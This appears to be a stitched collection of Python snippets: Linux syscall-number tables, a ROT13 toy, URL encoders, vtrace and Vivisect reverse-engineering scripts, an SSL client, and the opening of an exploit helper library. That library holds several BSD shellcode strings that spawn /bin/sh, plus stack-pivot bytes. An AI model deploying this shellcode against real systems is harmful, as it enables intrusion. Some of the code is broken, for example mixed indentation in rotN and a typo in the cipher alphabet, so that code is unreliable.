'''
syscall calling conventions:
    x86-32 Linux System Call convention:
    In x86-32 parameters for linux system call are passed using registers. %eax for syscall_number %ebx, %ecx, %edx, %esi, %edi, %ebp are used for passing 6 parameters to system calls. 
    I took fllowing snippet from http://www.cin.ufpe.br/~if817/arquivos/asmtut/index.html#syscalls but I'm doubtful about this. If any one can show an example. It would be great.
    If there are more than six arguments, %ebx must contain the memory location where the list of arguments is stored - but don't worry about this because it's unlikely that you'll use a syscall with more than six arguments.
    for example and little more reading, refer to http://www.int80h.org/bsdasm/#alternate-calling-convention

    x86-64 Linux & DragonFly BSD System Call convention:
    refer to section: "A.2 AMD64 Linux Kernel Conventions" of System V Application Binary Interface AMD64 Architecture Processor Supplement
    Here is the snippet from this section:
        User-level applications use as integer registers for passing the sequence %rdi, %rsi, %rdx, %rcx, %r8 and %r9. The kernel interface uses %rdi, %rsi, %rdx, %r10, %r8 and %r9.
        A system-call is done via the syscall instruction. The kernel destroys registers %rcx and %r11.
        The number of the syscall has to be passed in register %rax.
        System-calls are limited to six arguments, no argument is passed directly on the stack.
        Returning from the syscall, register %rax contains the result of the system-call. A value in the range between -4095 and -1 indicates an error, it is -errno.
        Only values of class INTEGER or class MEMORY are passed to the kernel.
'''

x86_32={
	"__NR_restart_syscall":0,
	"__NR_exit":1,
	"__NR_fork":2,
	"__NR_read":3,
	"__NR_write":4,
	"__NR_open":5,
	"__NR_close":6,
	"__NR_waitpid":7,
	"__NR_creat":8,
	"__NR_link":9,
	"__NR_unlink":10,
	"__NR_execve":11,
	"__NR_chdir":12,
	"__NR_time":13,
	"__NR_mknod":14,
	"__NR_chmod":15,
	"__NR_lchown":16,
	"__NR_break":17,
	"__NR_oldstat":18,
	"__NR_lseek":19,
	"__NR_getpid":20,
	"__NR_mount":21,
	"__NR_umount":22,
	"__NR_setuid":23,
	"__NR_getuid":24,
	"__NR_stime":25,
	"__NR_ptrace":26,
	"__NR_alarm":27,
	"__NR_oldfstat":28,
	"__NR_pause":29,
	"__NR_utime":30,
	"__NR_stty":31,
	"__NR_gtty":32,
	"__NR_access":33,
	"__NR_nice":34,
	"__NR_ftime":35,
	"__NR_sync":36,
	"__NR_kill":37,
	"__NR_rename":38,
	"__NR_mkdir":39,
	"__NR_rmdir":40,
	"__NR_dup":41,
	"__NR_pipe":42,
	"__NR_times":43,
	"__NR_prof":44,
	"__NR_brk":45,
	"__NR_setgid":46,
	"__NR_getgid":47,
	"__NR_signal":48,
	"__NR_geteuid":49,
	"__NR_getegid":50,
	"__NR_acct":51,
	"__NR_umount2":52,
	"__NR_lock":53,
	"__NR_ioctl":54,
	"__NR_fcntl":55,
	"__NR_mpx":56,
	"__NR_setpgid":57,
	"__NR_ulimit":58,
	"__NR_oldolduname":59,
	"__NR_umask":60,
	"__NR_chroot":61,
	"__NR_ustat":62,
	"__NR_dup2":63,
	"__NR_getppid":64,
	"__NR_getpgrp":65,
	"__NR_setsid":66,
	"__NR_sigaction":67,
	"__NR_sgetmask":68,
	"__NR_ssetmask":69,
	"__NR_setreuid":70,
	"__NR_setregid":71,
	"__NR_sigsuspend":72,
	"__NR_sigpending":73,
	"__NR_sethostname":74,
	"__NR_setrlimit":75,
	"__NR_getrlimit":76,#Backcompatible2Giglimitedrlimit*/,
	"__NR_getrusage":77,
	"__NR_gettimeofday":78,
	"__NR_settimeofday":79,
	"__NR_getgroups":80,
	"__NR_setgroups":81,
	"__NR_select":82,
	"__NR_symlink":83,
	"__NR_oldlstat":84,
	"__NR_readlink":85,
	"__NR_uselib":86,
	"__NR_swapon":87,
	"__NR_reboot":88,
	"__NR_readdir":89,
	"__NR_mmap":90,
	"__NR_munmap":91,
	"__NR_truncate":92,
	"__NR_ftruncate":93,
	"__NR_fchmod":94,
	"__NR_fchown":95,
	"__NR_getpriority":96,
	"__NR_setpriority":97,
	"__NR_profil":98,
	"__NR_statfs":99,
	"__NR_fstatfs":100,
	"__NR_ioperm":101,
	"__NR_socketcall":102,
	"__NR_syslog":103,
	"__NR_setitimer":104,
	"__NR_getitimer":105,
	"__NR_stat":106,
	"__NR_lstat":107,
	"__NR_fstat":108,
	"__NR_olduname":109,
	"__NR_iopl":110,
	"__NR_vhangup":111,
	"__NR_idle":112,
	"__NR_vm86old":113,
	"__NR_wait4":114,
	"__NR_swapoff":115,
	"__NR_sysinfo":116,
	"__NR_ipc":117,
	"__NR_fsync":118,
	"__NR_sigreturn":119,
	"__NR_clone":120,
	"__NR_setdomainname":121,
	"__NR_uname":122,
	"__NR_modify_ldt":123,
	"__NR_adjtimex":124,
	"__NR_mprotect":125,
	"__NR_sigprocmask":126,
	"__NR_create_module":127,
	"__NR_init_module":128,
	"__NR_delete_module":129,
	"__NR_get_kernel_syms":130,
	"__NR_quotactl":131,
	"__NR_getpgid":132,
	"__NR_fchdir":133,
	"__NR_bdflush":134,
	"__NR_sysfs":135,
	"__NR_personality":136,
	"__NR_afs_syscall":137,#SyscallforAndrewFileSystem*/,
	"__NR_setfsuid":138,
	"__NR_setfsgid":139,
	"__NR__llseek":140,
	"__NR_getdents":141,
	"__NR__newselect":142,
	"__NR_flock":143,
	"__NR_msync":144,
	"__NR_readv":145,
	"__NR_writev":146,
	"__NR_getsid":147,
	"__NR_fdatasync":148,
	"__NR__sysctl":149,
	"__NR_mlock":150,
	"__NR_munlock":151,
	"__NR_mlockall":152,
	"__NR_munlockall":153,
	"__NR_sched_setparam":154,
	"__NR_sched_getparam":155,
	"__NR_sched_setscheduler":156,
	"__NR_sched_getscheduler":157,
	"__NR_sched_yield":158,
	"__NR_sched_get_priority_max":159,
	"__NR_sched_get_priority_min":160,
	"__NR_sched_rr_get_interval":161,
	"__NR_nanosleep":162,
	"__NR_mremap":163,
	"__NR_setresuid":164,
	"__NR_getresuid":165,
	"__NR_vm86":166,
	"__NR_query_module":167,
	"__NR_poll":168,
	"__NR_nfsservctl":169,
	"__NR_setresgid":170,
	"__NR_getresgid":171,
	"__NR_prctl":172,
	"__NR_rt_sigreturn":173,
	"__NR_rt_sigaction":174,
	"__NR_rt_sigprocmask":175,
	"__NR_rt_sigpending":176,
	"__NR_rt_sigtimedwait":177,
	"__NR_rt_sigqueueinfo":178,
	"__NR_rt_sigsuspend":179,
	"__NR_pread64":180,
	"__NR_pwrite64":181,
	"__NR_chown":182,
	"__NR_getcwd":183,
	"__NR_capget":184,
	"__NR_capset":185,
	"__NR_sigaltstack":186,
	"__NR_sendfile":187,
	"__NR_getpmsg":188,#somepeopleactuallywantstreams*/,
	"__NR_putpmsg":189,#somepeopleactuallywantstreams*/,
	"__NR_vfork":190,
	"__NR_ugetrlimit":191,#SuScompliantgetrlimit*/,
	"__NR_mmap2":192,
	"__NR_truncate64":193,
	"__NR_ftruncate64":194,
	"__NR_stat64":195,
	"__NR_lstat64":196,
	"__NR_fstat64":197,
	"__NR_lchown32":198,
	"__NR_getuid32":199,
	"__NR_getgid32":200,
	"__NR_geteuid32":201,
	"__NR_getegid32":202,
	"__NR_setreuid32":203,
	"__NR_setregid32":204,
	"__NR_getgroups32":205,
	"__NR_setgroups32":206,
	"__NR_fchown32":207,
	"__NR_setresuid32":208,
	"__NR_getresuid32":209,
	"__NR_setresgid32":210,
	"__NR_getresgid32":211,
	"__NR_chown32":212,
	"__NR_setuid32":213,
	"__NR_setgid32":214,
	"__NR_setfsuid32":215,
	"__NR_setfsgid32":216,
	"__NR_pivot_root":217,
	"__NR_mincore":218,
	"__NR_madvise":219,
	"__NR_madvise1":219,#deletewhenClibstubisremoved*/,
	"__NR_getdents64":220,
	"__NR_fcntl64":221,
#":223isunused*/,
	"__NR_gettid":224,
	"__NR_readahead":225,
	"__NR_setxattr":226,
	"__NR_lsetxattr":227,
	"__NR_fsetxattr":228,
	"__NR_getxattr":229,
	"__NR_lgetxattr":230,
	"__NR_fgetxattr":231,
	"__NR_listxattr":232,
	"__NR_llistxattr":233,
	"__NR_flistxattr":234,
	"__NR_removexattr":235,
	"__NR_lremovexattr":236,
	"__NR_fremovexattr":237,
	"__NR_tkill":238,
	"__NR_sendfile64":239,
	"__NR_futex":240,
	"__NR_sched_setaffinity":241,
	"__NR_sched_getaffinity":242,
	"__NR_set_thread_area":243,
	"__NR_get_thread_area":244,
	"__NR_io_setup":245,
	"__NR_io_destroy":246,
	"__NR_io_getevents":247,
	"__NR_io_submit":248,
	"__NR_io_cancel":249,
	"__NR_fadvise64":250,
#":251isavailableforreuse(wasbrieflysys_set_zone_reclaim)*/,
	"__NR_exit_group":252,
	"__NR_lookup_dcookie":253,
	"__NR_epoll_create":254,
	"__NR_epoll_ctl":255,
	"__NR_epoll_wait":256,
	"__NR_remap_file_pages":257,
	"__NR_set_tid_address":258,
	"__NR_timer_create":259,
	"__NR_timer_settime":260,
	"__NR_timer_gettime":261,
	"__NR_timer_getoverrun":262,
	"__NR_timer_delete":263,
	"__NR_clock_settime":264,
	"__NR_clock_gettime":265,
	"__NR_clock_getres":266,
	"__NR_clock_nanosleep":267,
	"__NR_statfs64":268,
	"__NR_fstatfs64":269,
	"__NR_tgkill":270,
	"__NR_utimes":271,
	"__NR_fadvise64_64":272,
	"__NR_vserver":273,
	"__NR_mbind":274,
	"__NR_get_mempolicy":275,
	"__NR_set_mempolicy":276,
	"__NR_mq_open":277,
	"__NR_mq_unlink":278,
	"__NR_mq_timedsend":279,
	"__NR_mq_timedreceive":280,
	"__NR_mq_notify":281,
	"__NR_mq_getsetattr":282,
	"__NR_kexec_load":283,
	"__NR_waitid":284,
#":define"__NR_sys_setaltroot285*/,
	"__NR_add_key":286,
	"__NR_request_key":287,
	"__NR_keyctl":288,
	"__NR_ioprio_set":289,
	"__NR_ioprio_get":290,
	"__NR_inotify_init":291,
	"__NR_inotify_add_watch":292,
	"__NR_inotify_rm_watch":293,
	"__NR_migrate_pages":294,
	"__NR_openat":295,
	"__NR_mkdirat":296,
	"__NR_mknodat":297,
	"__NR_fchownat":298,
	"__NR_futimesat":299,
	"__NR_fstatat64":300,
	"__NR_unlinkat":301,
	"__NR_renameat":302,
	"__NR_linkat":303,
	"__NR_symlinkat":304,
	"__NR_readlinkat":305,
	"__NR_fchmodat":306,
	"__NR_faccessat":307,
	"__NR_pselect6":308,
	"__NR_ppoll":309,
	"__NR_unshare":310,
	"__NR_set_robust_list":311,
	"__NR_get_robust_list":312,
	"__NR_splice":313,
	"__NR_sync_file_range":314,
	"__NR_tee":315,
	"__NR_vmsplice":316,
	"__NR_move_pages":317,
	"__NR_getcpu":318,
	"__NR_epoll_pwait":319,
	"__NR_utimensat":320,
	"__NR_signalfd":321,
	"__NR_timerfd_create":322,
	"__NR_eventfd":323,
	"__NR_fallocate":324,
	"__NR_timerfd_settime":325,
	"__NR_timerfd_gettime":326,
	"__NR_signalfd4":327,
	"__NR_eventfd2":328,
	"__NR_epoll_create1":329,
	"__NR_dup3":330,
	"__NR_pipe2":331,
	"__NR_inotify_init1":332,
	"__NR_preadv":333,
	"__NR_pwritev":334,
	"__NR_rt_tgsigqueueinfo":335,
	"__NR_perf_counter_open":336,
}


x86_64={
	"__NR_read":0,
	"__NR_write":1,
	"__NR_open":2,
	"__NR_close":3,
	"__NR_stat":4,
	"__NR_fstat":5,
	"__NR_lstat":6,
	"__NR_poll":7,
	"__NR_lseek":8,
	"__NR_mmap":9,
	"__NR_mprotect":10,
	"__NR_munmap":11,
	"__NR_brk":12,
	"__NR_rt_sigaction":13,
	"__NR_rt_sigprocmask":14,
	"__NR_rt_sigreturn":15,
	"__NR_ioctl":16,
	"__NR_pread64":17,
	"__NR_pwrite64":18,
	"__NR_readv":19,
	"__NR_writev":20,
	"__NR_access":21,
	"__NR_pipe":22,
	"__NR_select":23,
	"__NR_sched_yield":24,
	"__NR_mremap":25,
	"__NR_msync":26,
	"__NR_mincore":27,
	"__NR_madvise":28,
	"__NR_shmget":29,
	"__NR_shmat":30,
	"__NR_shmctl":31,
	"__NR_dup":32,
	"__NR_dup2":33,
	"__NR_pause":34,
	"__NR_nanosleep":35,
	"__NR_getitimer":36,
	"__NR_alarm":37,
	"__NR_setitimer":38,
	"__NR_getpid":39,
	"__NR_sendfile":40,
	"__NR_socket":41,
	"__NR_connect":42,
	"__NR_accept":43,
	"__NR_sendto":44,
	"__NR_recvfrom":45,
	"__NR_sendmsg":46,
	"__NR_recvmsg":47,
	"__NR_shutdown":48,
	"__NR_bind":49,
	"__NR_listen":50,
	"__NR_getsockname":51,
	"__NR_getpeername":52,
	"__NR_socketpair":53,
	"__NR_setsockopt":54,
	"__NR_getsockopt":55,
	"__NR_clone":56,
	"__NR_fork":57,
	"__NR_vfork":58,
	"__NR_execve":59,
	"__NR_exit":60,
	"__NR_wait4":61,
	"__NR_kill":62,
	"__NR_uname":63,
	"__NR_semget":64,
	"__NR_semop":65,
	"__NR_semctl":66,
	"__NR_shmdt":67,
	"__NR_msgget":68,
	"__NR_msgsnd":69,
	"__NR_msgrcv":70,
	"__NR_msgctl":71,
	"__NR_fcntl":72,
	"__NR_flock":73,
	"__NR_fsync":74,
	"__NR_fdatasync":75,
	"__NR_truncate":76,
	"__NR_ftruncate":77,
	"__NR_getdents":78,
	"__NR_getcwd":79,
	"__NR_chdir":80,
	"__NR_fchdir":81,
	"__NR_rename":82,
	"__NR_mkdir":83,
	"__NR_rmdir":84,
	"__NR_creat":85,
	"__NR_link":86,
	"__NR_unlink":87,
	"__NR_symlink":88,
	"__NR_readlink":89,
	"__NR_chmod":90,
	"__NR_fchmod":91,
	"__NR_chown":92,
	"__NR_fchown":93,
	"__NR_lchown":94,
	"__NR_umask":95,
	"__NR_gettimeofday":96,
	"__NR_getrlimit":97,
	"__NR_getrusage":98,
	"__NR_sysinfo":99,
	"__NR_times":100,
	"__NR_ptrace":101,
	"__NR_getuid":102,
	"__NR_syslog":103,
#":attheveryendthestuffthatneverrunsduringthebenchmarks*/,
	"__NR_getgid":104,
	"__NR_setuid":105,
	"__NR_setgid":106,
	"__NR_geteuid":107,
	"__NR_getegid":108,
	"__NR_setpgid":109,
	"__NR_getppid":110,
	"__NR_getpgrp":111,
	"__NR_setsid":112,
	"__NR_setreuid":113,
	"__NR_setregid":114,
	"__NR_getgroups":115,
	"__NR_setgroups":116,
	"__NR_setresuid":117,
	"__NR_getresuid":118,
	"__NR_setresgid":119,
	"__NR_getresgid":120,
	"__NR_getpgid":121,
    "__NR_setfsuid":122,
    "__NR_setfsgid":123,
    "__NR_getsid":124,
    "__NR_capget":125,
    "__NR_capset":126,
    "__NR_rt_sigpending":127,
	"__NR_rt_sigtimedwait":128,
	"__NR_rt_sigqueueinfo":129,
	"__NR_rt_sigsuspend":130,
	"__NR_sigaltstack":131,
	"__NR_utime":132,
	"__NR_mknod":133,
#":Onlyneededfora.out*/,
	"__NR_uselib":134,
	"__NR_personality":135,
	"__NR_ustat":136,
	"__NR_statfs":137,
	"__NR_fstatfs":138,
	"__NR_sysfs":139,
	"__NR_getpriority":140,
	"__NR_setpriority":141,
	"__NR_sched_setparam":142,
	"__NR_sched_getparam":143,
	"__NR_sched_setscheduler":144,
	"__NR_sched_getscheduler":145,
	"__NR_sched_get_priority_max":146,
	"__NR_sched_get_priority_min":147,
	"__NR_sched_rr_get_interval":148,
	"__NR_mlock":149,
	"__NR_munlock":150,
	"__NR_mlockall":151,
	"__NR_munlockall":152,
	"__NR_vhangup":153,
	"__NR_modify_ldt":154,
	"__NR_pivot_root":155,
	"__NR__sysctl":156,
	"__NR_prctl":157,
	"__NR_arch_prctl":158,
	"__NR_adjtimex":159,
	"__NR_setrlimit":160,
	"__NR_chroot":161,
	"__NR_sync":162,
	"__NR_acct":163,
	"__NR_settimeofday":164,
	"__NR_mount":165,
	"__NR_umount2":166,
	"__NR_swapon":167,
	"__NR_swapoff":168,
	"__NR_reboot":169,
	"__NR_sethostname":170,
	"__NR_setdomainname":171,
	"__NR_iopl":172,
	"__NR_ioperm":173,
	"__NR_create_module":174,
	"__NR_init_module":175,
	"__NR_delete_module":176,
	"__NR_get_kernel_syms":177,
	"__NR_query_module":178,
	"__NR_quotactl":179,
	"__NR_nfsservctl":180,
#":reservedforLiS/STREAMS*/,
	"__NR_getpmsg":181,
	"__NR_putpmsg":182,
#":reservedforAFS*/,
	"__NR_afs_syscall":183,
#":reservedfortux*/,
	"__NR_tuxcall":184,
	"__NR_security":185,
	"__NR_gettid":186,
	"__NR_readahead":187,
	"__NR_setxattr":188,
	"__NR_lsetxattr":189,
	"__NR_fsetxattr":190,
	"__NR_getxattr":191,
	"__NR_lgetxattr":192,
	"__NR_fgetxattr":193,
	"__NR_listxattr":194,
	"__NR_llistxattr":195,
	"__NR_flistxattr":196,
	"__NR_removexattr":197,
	"__NR_lremovexattr":198,
	"__NR_fremovexattr":199,
	"__NR_tkill":200,
	"__NR_time":201,
	"__NR_futex":202,
	"__NR_sched_setaffinity":203,
	"__NR_sched_getaffinity":204,
	"__NR_set_thread_area":205,
	"__NR_io_setup":206,
	"__NR_io_destroy":207,
	"__NR_io_getevents":208,
	"__NR_io_submit":209,
	"__NR_io_cancel":210,
	"__NR_get_thread_area":211,
	"__NR_lookup_dcookie":212,
	"__NR_splice":275,
	"__NR_tee":276,
	"__NR_sync_file_range":277,
	"__NR_vmsplice":278,
	"__NR_move_pages":279,
	"__NR_utimensat":280,
	"__NR_epoll_pwait":281,
	"__NR_signalfd":282,
	"__NR_timerfd_create":283,
	"__NR_eventfd":284,
	"__NR_fallocate":285,
	"__NR_timerfd_settime":286,
	"__NR_timerfd_gettime":287,
	"__NR_accept4":288,
	"__NR_signalfd4":289,
	"__NR_eventfd2":290,
	"__NR_epoll_create1":291,
	"__NR_dup3":292,
	"__NR_pipe2":293,
	"__NR_inotify_init1":294,
	"__NR_preadv":295,
	"__NR_pwritev":296,
	"__NR_rt_tgsigqueueinfo":297,
	"__NR_perf_counter_open":298,
}



#!/usr/bin/python

#  toy "ROT13" en/decryptor

import sys

a = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
#   Reversed Alphbet
#b = "zyxwvutsrqponmlkjihgfedcba"

#ROT13
b = "nopqrstuvwxyzabcdefghijklmNOPQRSTUBWXYZABCDEFGHIJKLM"

# Gil Bates 
#b = "ubcdefghijnlmkopqrstavwxyz"
#b = "abcedfgkijhlmnopqrsutvwxyz"

def crypto(text):
	output = ""
	for i in range(0,len(text)):
		index = a.find(text[i])
		if index > -1:
			output += b[index]
		else:
			output += text[i]
	return output
if len(sys.argv) > 1:
	ciphertext = sys.argv[1]
else:
	ciphertext = sys.stdin.read()

print(crypto(ciphertext))

def rotN(text, ROTNUM):
    global a,b
    b = a[ROTNUM:26] + a[:ROTNUM] + a[26+ROTNUM:] + a[26:ROTNUM+26]
	output = ""
	for i in range(0,len(text)):
		index = a.find(text[i])
		if index > -1:
			output += b[index]
		else:
			output += text[i]
	return output





import re

ILLEGALCHARS = "[/%^\*()&#$!@\\\[\]]"

def urlencode(inp):
    outputline = ""
    matches = re.findall(ILLEGALCHARS, inp)
    inplen = len(inp)
    inpbuf = buffer(inp)
    offset = 0
    for match in matches:
        next = inp.find(match, offset)
        if next > -1:
            outputline += inpbuf[offset:next] + "%%%2x"%(ord(match))
            offset = next+1
        else:
            outputline += inpbuf[offset:]
            offset = inplen
    return outputline

urlencode('AAAAAaaaaaaaaa/%$#')


def urldecode(inp):
    outputline = ""
    inplen = len(inp)
    inpbuf = buffer(inp)
    offset = 0
    while offset < inplen:
        next = inp.find('%', offset)
        if next > -1:
            byte = int(inpbuf[next+1:next+3],16)
            outputline += inpbuf[offset:next] + chr(byte)
            offset = next+3
        else:
            outputline += inpbuf[offset:]
            offset = inplen
    return outputline



#!/usr/bin/python

from atlasutils.vtraceutils import *

"""
currently a toy.  Not for general consumption
"""


if len(argv) == 1:
    print ("Syntax:   $ %s <programpath>"%argv[0])
    exit(1)
    

            


class LibcallBreakpoint(Breakpoint):
    def __init__(self, libcall):
        Breakpoint.__init__(self, int(libcall.value))
        self.name = libcall.name
        self.stype = libcall.stype
        self.value = libcall.value
        self.fname = libcall.fname
    
    def notify(self, event, trace):
        #eip = trace.getProgramCounter()
        pid = trace.getMeta('ThreadId')
        esp = trace.getRegisterByName('esp')
        ret = trace.readMemoryFormat(esp, "L")[0]
        print("%x (t%d): call to %s:%s (%x)"%(ret, pid, self.fname, self.name, self.value))
        


class LibraryNotifier(vtrace.Notifier):
    """
    A small example notifier which prints
    out libraries as they are loaded.
    """
    def notify(self, event, trace):
        if event == vtrace.NOTIFY_LOAD_LIBRARY:
            lib = trace.getMeta("LatestLibrary")
            print "-----Library Loaded:",lib
            self.addBreaksForLib(trace, lib)

    def addBreaksForLib(self, me, lib):
        for sym in me.getSymsForFile(lib):
            if sym.stype == 2 and sym.value != 0:
                print ("setting breakpoint at %s:%s (%x)"%(lib, sym.name, sym.value))
                bp = LibcallBreakpoint(sym)
                me.addBreakpoint(bp)

bin = argv[1]
args = ""
if len(argv) > 2:
    args = " ".join(argv[2:])


me = getTrace()
libnotifier = LibraryNotifier()
me.execute("%s %s"%(bin,args))
me.registerNotifier(NOTIFY_LOAD_LIBRARY, libnotifier)


for lib in me.getNormalizedLibNames():
    libnotifier.addBreaksForLib(me, lib)


me.setMode("RunForever", True)

me.run()


def doStrings(start, end, minbytes=4):
    print "%x -> %x" % (start, end)
    last = None
    va = start
    while va < end:
        ch = ord(vw.readMemory(va,1))
        if vw.xrefs_by_to.get(va) is not None or (9 <= ch <=0x7f):
            x = va + 1
            while x < end:
                #print "x: %x" % x
                ch = ord(vw.readMemory(x,1))
                if not (ch == 0 or 0x20 <= ch <=0x7e):
                    #print "nope %x" % va
                    break
                if vw.xrefs_by_to.get(x) is not None or ch == 0:
                    #if x-va > minbytes and :
                    vw.makeString(va)
                    #print ("-- %x - %x" % (va, x))
                    while x < end and vw.readMemory(x+1,1) == '\x00':
                        x += 1
                    va = x
                    break
                else:
                    x += 1
        va += 1
    print "done"


if 'vw' in globals().keys():
    start = int(argv[1],16)
    stop  = int(argv[2],16)
    doStrings(start, stop)



#!/usr/bin/python
#
# client.py
#
"""
Simple SSL client, using blocking I/O
"""

from OpenSSL import SSL
import sys, os, select, socket


if len(sys.argv) < 3:
    print 'Usage: %s HOST PORT'%sys.argv[0]
    sys.exit(1)


#def verify_cert(conn, cert, errnum, depth, ok):
    ## crappy version scraped from example code... Unnecessary for 
    #print 'Got certificate: %s' % cert.get_subject()
    #return ok

def sendsock(sock,outinfo):
    print >>sys.stderr,(">> %s"%repr(outinfo))
    sock.sendall(outinfo)

def readsock(sock):
    readsomething = False
    readstuff= ""
    readsomething = True
    #print>>sys.stderr,("< ")
    try:
        readstuff += sock.recv(1024)
    except SSL.ZeroReturnError:
        print>>sys.stderr,("<< %s"%readstuff)
        return readstuff
            
    except SSL.Error:
        print 'Connection died unexpectedly'
        x,y,z=sys.exc_info()
        sys.excepthook(x,y,z)

ctx = SSL.Context(SSL.SSLv23_METHOD)
#basedir = os.path.dirname(sys.argv[0])
#if basedir == '':
    #basedir = os.curdir
#ctx.set_verify(SSL.VERIFY_PEER, verify_cert)
#ctx.use_privatekey_file (os.path.join(basedir, 'client.pkey'))
#ctx.use_certificate_file(os.path.join(basedir, 'client.crt'))
#ctx.load_verify_locations(os.path.join(basedir, 'CA.crt'))

# Set up client
sock = SSL.Connection(ctx, socket.socket(socket.AF_INET, socket.SOCK_STREAM))
sock.connect((sys.argv[1], int(sys.argv[2])))


while 1:
    try:
        x,y,z = select.select([sys.stdin, sock],[],[],.1)
        #x,y,z = select.select([sys.stdin, sock],[],[],.1)
        if sys.stdin in x:
            #print>>sys.stderr,(">")
            line = sys.stdin.read(1000)
            if line != '':
                sendsock(sock,line)
        
        if sock in x:
            #print>>sys.stderr,("<")
            sys.stdout.write(sock.recv(1500))
            sys.stdout.flush()
        
    except SSL.ZeroReturnError:
        exit(0)
    except SSL.Error:
        print 'Connection died unexpectedly'
        x,y,z=sys.exc_info()
        sys.excepthook(x,y,z)
        break


sock.shutdown()
sock.close()



import logging
logger = logging.getLogger('vivscripts.makeStrings')

import string
printables = string.printable.encode('utf-8')

logger.warning("String Finder")
def main(argv):
    vw.vprint("String Finder")
    if len(argv) == 4:
        minsize = int(argv[3], 0)
    else:
        minsize = 3

    makeStrings(vw, int(argv[1], 0), int(argv[2], 0), minsize)
    vw.vprint("DONE.")


def makeStrings(vw, startva, endva, minsize=3):
    count = 0
    strlen = 0
    va = startva

    while va < endva:
        logger.warning('..va: 0x%x', va)
        loctup = vw.getLocation(va)
        if loctup is not None:
            logger.warning('...location exists: %r', loctup)
            lva, lsz, ltype, ltinfo = loctup
            va = lva + lsz
        
        elif vw.readMemory(va, 1) == b'\0':
            logger.warning('...skipping NULL byte')
            va += 1
            continue

        else:
            off = 0
            bad = False
            char = vw.readMemory(va + off, 1)

            logger.warning('...seeking NULL byte:')
            while char != b'\0':
                logger.warning('....offset: %d', off)
                if (va+off >= endva):
                    logger.warning("..... not found NULL before endva.")
                    bad = True
                    va += off + 1
                    break

                logger.warning('....char: %r', char)
                if char not in printables:
                    bad = True
                    va += off + 1
                    break

                off += 1
                char = vw.readMemory(va + off, 1)

            if bad:
                # find a good starting point again... or just bail?
                logger.warning("BAD string... bailing early cuz i'm lazy")
                va += off + 1
                while char != b'\0':
                    va += 1
                    char = vw.readMemory(va, 1)



            else:
                if off >= minsize:
                    vw.makeString(va)
                    count += 1
                    strlen += off
                va += off + 1

            # done 
    logger.warning("New Strings: %d  (%d bytes)", count, strlen)
    vw.vprint("New Strings: %d  (%d bytes)" % (count, strlen))



# only usable as a Vivisect script tool
if __name__ == 'builtins':
    print('\n'.join(globals().keys()))
    print(repr(argv))
    main(argv)

else:
    print(__name__)



#!/usr/bin/python
#       Version 2.0
#
#  hacklib.py makes available various helper subs for the hacking process.  'import hacklib'
#
#       xw(String)      - takes in a 4-byte string parameter(with/wo "0x"), returns little-endian DWORD
#       xw("0x080489af")
#       genShell(#,#[,#])       - Takes in which shell, overall size, and size of front NOP sled.
#       
#       genformatstring('0xoverwrittenaddress', '0xshellcodeaddress' [, offset])
#       - creates a format string which will overwrite the first address location with the second address
#       offset allows you to adjust where the address is located due to prepended bytes (as in --inline)
#       or differences in printf
#
#  I cannot stress enough that this is a helper library for use with specific hacking tasks.  It is not intended to 
# compete with nor replace the Metasploit framework.  The msf team has worked hard to build a *very* powerful framework
# for writing exploits which is unrivaled.  The hacklib is simply a tool to help the hacker/reverse engineer keep themselves
# very close to the commandline.  Consider it part of my b@-utility belt which I'm sharing with you.  Improvements are 
# welcome, destructive criticism is worthless.  I have no illusion of it being very great.
# @


import struct
import sys
import random
import socket

SHELLS = {}
NETBIND = {}

DEFAULT_NOPS = b"ABCFGHKIJ@'"

PIVOTBYTES_x86 = ( b'\x87\xc4', b'\x87\xcc', b'\x87\xd4', b'\x87\xdc', b'\x87\xe0', b'\x87\xe1', b'\x87\xe2', b'\x87\xe3', b'\x87\xe5', b'\x87\xe6', b'\x87\xe7', b'\x87\xec', b'\x87\xf4', b'\x87\xfc', )

#bsd shell of unknown origin...
SHELLS['bsd-unknown'] = b"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"

#bsd shell of unknown origin...
SHELLS['bsd-unknown2'] = b"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff/bin/sh\x00"


#from http://shellcode.org/Shellcode/BSD/bsd-shellcode.html
SHELLS['bsd-shellcode.org'] = b"\x31\xc0\x50\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcc\x80"


#from $ebp forward (my own)  used for dc13 prequals stage 7
SHELLS['bsd-ebp-forward']=b"\xc7\x45\x24" + b"\x90\x90\x31\xc0" + b"\xc7\x45\x28" + b"\x50\x50\x50\xb0" + b"\xc7\x45\x2c" + b"\x17\xcc\x80\x31" + b"\xc7\x45\x30" + b"\xc0\x50\x68\x2f" + b"\xc7\x45\x34" + b"\x2f\x73\x68\x68" + b"\xc7\x45\x38" + b"\x2f\x62\x69\x6e" + b"\xc7\x45\x3c" + b"\x89\xe3\x50\x54" + b"\xc7\x45\x40" + b"\x53\x50\xb0\x3b" + b"\xc7\x45\x44" + b"\xcc\x80\x31\xc0" + b"\xc7\x45\x48" + b"\xb0\x01\xcc\x80" + b"\xfe\x45\x44" + b"\xfe\x45\x4a" + b"\xfe\x45\x2d" + b"\x8d\x55\x24" + b"\xff\xe2"

# Inplace editing using jmp/call/pop method!
SHELLS['bsd-jmpcallpop'] = b"\xeb\x30\x5b" + b"\xfe\x43\xf9\xfe\x43\xf3\xfe\x43\xdc" + b"\x31\xc0\x50\x50\x50\xb0\x17\xcc\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcc\x80\x31\xc0\xb0\x01\xcc\x80" + b"\xe8\xcb\xff\xff\xff"

